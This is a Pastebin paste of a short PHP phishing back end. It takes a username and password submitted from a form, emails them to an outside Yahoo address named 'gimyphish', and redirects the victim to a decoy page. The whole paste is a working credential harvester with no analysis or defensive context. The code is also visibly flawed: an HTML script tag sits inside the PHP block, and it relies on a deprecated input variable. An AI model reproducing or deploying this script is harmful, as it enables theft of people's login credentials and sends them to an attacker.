Advertisement
Guest User

Untitled

a guest
May 13th, 2017
521
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html><body>
  2.  
  3. <?php
  4.  
  5.      $user=$HTTP_POST_VARS['user'];
  6.  
  7.      $pass=$HTTP_POST_VARS['pass'];
  8.  
  9.         $mailtext="username:";
  10.  
  11.         $mailtext.=$user;
  12.  
  13.         $mailtext.="\n";
  14.  
  15.         $mailtext.="Password: ";
  16.  
  17.         $mailtext.=$pass;
  18.  
  19.         $absender="From:";
  20.  
  21.         $absender.="gimygold@yahoo.de";
  22.  
  23.         mail("gimyphish@yahoo.de",$user,$mailtext,$absender);
  24.  
  25. <script>window.location.href = "false.html";</script>
  26.  
  27.  
  28.  
  29.         ?>
  30.  
  31. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement